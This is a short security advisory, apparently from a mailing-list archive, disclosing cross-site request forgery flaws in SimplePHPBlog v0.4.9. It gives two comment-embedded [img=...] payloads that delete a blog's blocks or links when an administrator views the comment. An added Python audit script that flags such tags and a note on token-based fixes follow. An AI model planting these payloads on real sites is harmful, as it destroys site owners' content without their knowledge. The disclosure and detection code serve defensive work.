Multiple CSRF in SimplePHPBlog Oct 17 2007 02:00PM
deme hackish eu (1 replies)
SimplePHPBlog

Cross Site Request Forgeries

Tested on v0.4.9

Discovered by: Demential

Web: http://hackish.altervista.org

E-mail: deme [at] hackish [dot] eu

SimplePHPBlog website: http://www.simplephpblog.com/

- Posting [img=add_block.php?action=delete&block_id=*] in a comment, where * is the ID of a block: when the administrator reads the comment, block * will be erased.

- Posting [img=add_link.php?action=delete&link_id=*] in a comment, where * is the ID of a link: when the administrator reads the comment, link * will be erased.

[ reply ]
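An added example, not part of the original post and not SimplePHPBlog code: a Python audit that scans stored comment text for the [img=...] tags described above whose target is a script request rather than an image file. The comment ids, the sample comments and the numeric block and link ids are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches the target of an [img=...] tag in comment text.
IMG_TAG = re.compile(r"\[img=([^\]\s]+)", re.IGNORECASE)
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif")

# Constructed sample data: comment id -> stored comment text.
SAMPLE_COMMENTS = {
    "c1": "Nice post! [img=add_block.php?action=delete&block_id=3]",
    "c2": "look [img=add_link.php?action=delete&link_id=7] here",
    "c3": "My cat: [img=images/cat.png]",
    "c4": "No tags at all.",
}


def suspicious_img_targets(comment):
    """Return (target, reasons) for img tags that request a script, not an image."""
    hits = []
    for target in IMG_TAG.findall(comment):
        url = urlsplit(target)
        reasons = []
        if not url.path.lower().endswith(IMAGE_EXT):
            reasons.append("path is not an image file")
        if url.query:
            names = sorted(parse_qs(url.query, keep_blank_values=True))
            reasons.append("query parameters: " + ", ".join(names))
        if reasons:
            hits.append((target, reasons))
    return hits


def audit(comments):
    """Map comment id -> findings, only for comments with at least one finding."""
    findings = {}
    for cid, text in comments.items():
        hits = suspicious_img_targets(text)
        if hits:
            findings[cid] = hits
    return findings


if __name__ == "__main__":
    for cid, hits in audit(SAMPLE_COMMENTS).items():
        for target, reasons in hits:
            print(f"{cid}: {target} ({'; '.join(reasons)})")
```

A finding only identifies the comment vector; the underlying fix is for the delete actions to accept only a POST that carries a per-session anti-CSRF token, so that an image fetch cannot trigger them.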
Re: Multiple CSRF in SimplePHPBlog Oct 17 2007 07:27PM
Hanno Böck (ml hboeck de)


 

Copyright 2010, SecurityFocus